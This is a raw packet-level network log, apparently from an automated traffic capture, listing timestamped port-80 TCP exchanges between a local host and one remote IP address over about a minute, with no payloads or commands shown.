                                                                                                  Jan 1, 2025 02:27:37.445766926 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.445806980 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.550216913 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.555125952 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.555136919 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.555145025 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.795023918 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.802158117 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.802195072 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.802220106 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.802258968 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.802366018 CET4977380192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:37.807111025 CET8049773185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.943321943 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:37.987545013 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.098577023 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.098732948 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.099142075 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.099194050 CET4977480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.103533983 CET8049774185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.221316099 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.226218939 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.226283073 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.226448059 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.231703997 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.581341028 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.586247921 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.586260080 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.586270094 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.956531048 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.964437962 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.964493036 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:38.964529037 CET8049775185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:38.964570999 CET4977580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.421642065 CET4979080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.421793938 CET4979080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.426436901 CET8049790185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:49.545087099 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.549926996 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:49.552031994 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.552170992 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.557018995 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:49.909552097 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:49.914482117 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:49.914493084 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:49.914503098 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.253700018 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.260987043 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.261090040 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.262619972 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.262761116 CET4979180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.267576933 CET8049791185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.394371033 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.399276018 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.399344921 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.399451971 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.404206991 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.758596897 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:50.763572931 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.763583899 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:50.763592958 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.101479053 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.111953974 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.111996889 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.112029076 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.112071991 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.112154961 CET4979280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.116951942 CET8049792185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.233216047 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.238044024 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.238115072 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.238217115 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.242985964 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.597038984 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.601933002 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.601946115 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.601953983 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.939886093 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.947170019 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.947222948 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.947241068 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:51.947284937 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.947349072 CET4979480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:51.952070951 CET8049794185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.063338995 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.068249941 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.068325043 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.068526983 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.073295116 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.425163984 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.431917906 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.432028055 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.432037115 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.779947042 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.831324100 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.917870045 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.918123960 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.918349028 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:52.918417931 CET4979580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:52.922904968 CET8049795185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.031459093 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.036356926 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.036441088 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.036608934 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.041418076 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.394942999 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.399907112 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.399919033 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.399928093 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.747189999 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.757153988 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.757241964 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.757246971 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.757294893 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.757425070 CET4979680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.762160063 CET8049796185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.873830080 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.878690004 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:53.878773928 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.878933907 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:53.883728981 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.237657070 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.242563963 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.242575884 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.242584944 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.285561085 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.285857916 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.290363073 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.290421963 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.290532112 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.295247078 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.331269026 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.370882034 CET8049798185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.370927095 CET4979880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.404285908 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.409146070 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.409198999 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.409318924 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.414057970 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.643901110 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.648698092 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.648861885 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.753259897 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:54.758239985 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.758249998 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:54.758256912 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.001338959 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.050055981 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.114847898 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.159471035 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.173346043 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.173455000 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.173532009 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.173618078 CET4980080192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.174442053 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.174526930 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.174577951 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.174624920 CET4979980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.178364038 CET8049800185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.179390907 CET8049799185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.295784950 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.300649881 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.302015066 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.302218914 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.302258015 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:55.307051897 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307060957 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307198048 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:55.307205915 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.034147978 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045001984 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045041084 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.045105934 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.085231066 CET4980680192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.090030909 CET8049806185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.306143045 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.310973883 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.311069012 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.314662933 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.319475889 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.659555912 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:56.664448023 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.664460897 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:56.664470911 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.033912897 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.041899920 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.041949987 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.042043924 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.042052984 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.042087078 CET4981280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.046798944 CET8049812185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.155817032 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.160597086 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.160654068 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.160756111 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.165477037 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.518896103 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.523775101 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.523808002 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.523823023 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.863013029 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.870934010 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:27:57.871021032 CET4981880192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:27:57.871049881 CET8049818185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.070817947 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.439157963 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.446872950 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.446927071 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.446968079 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.447017908 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.447046995 CET4990980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.451853037 CET8049909185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.561208010 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.566040039 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.566401005 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.566495895 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.571309090 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.925236940 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:09.930187941 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.930200100 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:09.930210114 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.290724039 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.334517956 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.431458950 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.431643009 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.431786060 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.431826115 CET4991780192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.436423063 CET8049917185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.545980930 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.550844908 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.550901890 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.551018000 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.555819035 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.909564972 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:10.914412022 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.914434910 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:10.914446115 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.260884047 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.315753937 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.399409056 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.399607897 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.399993896 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.400046110 CET4992480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.404436111 CET8049924185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.512708902 CET4993180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.517481089 CET8049931185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.517560959 CET4993180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.517672062 CET4993180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.522423029 CET8049931185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.628889084 CET4993180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.629036903 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.633831978 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.633900881 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.633991957 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.638736963 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.675270081 CET8049931185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.748699903 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.753587008 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.753683090 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.753803015 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.758573055 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.987782955 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:11.992568016 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:11.992676973 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.047394037 CET8049931185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.050062895 CET4993180192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.112699986 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.117898941 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.117909908 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.117921114 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.376564026 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.384185076 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.384233952 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.384263039 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.384284973 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.384473085 CET4993280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.389241934 CET8049932185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.501991034 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.510299921 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.510353088 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.510392904 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.510445118 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.510483027 CET4993480192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.515270948 CET8049934185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.623713017 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.628581047 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.628693104 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.628787041 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.633560896 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.987763882 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:12.992603064 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.992615938 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:12.992624998 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.339696884 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.393891096 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.477030039 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.477258921 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.477346897 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.477396011 CET4994280192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.481998920 CET8049942185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.593327999 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.598196983 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.598278999 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.598387003 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.603224993 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.956963062 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:13.961842060 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.961879015 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:13.961888075 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.300443888 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.308139086 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.308180094 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.308242083 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:14.308873892 CET4994980192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:14.313662052 CET8049949185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.423780918 CET4995580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:14.428559065 CET8049955185.239.51.56192.168.2.4
                                                                                                  Jan 1, 2025 02:28:14.428628922 CET4995580192.168.2.4185.239.51.56
                                                                                                  Jan 1, 2025 02:28:14.428764105 CET4995580192.168.2.4185.239.51.56
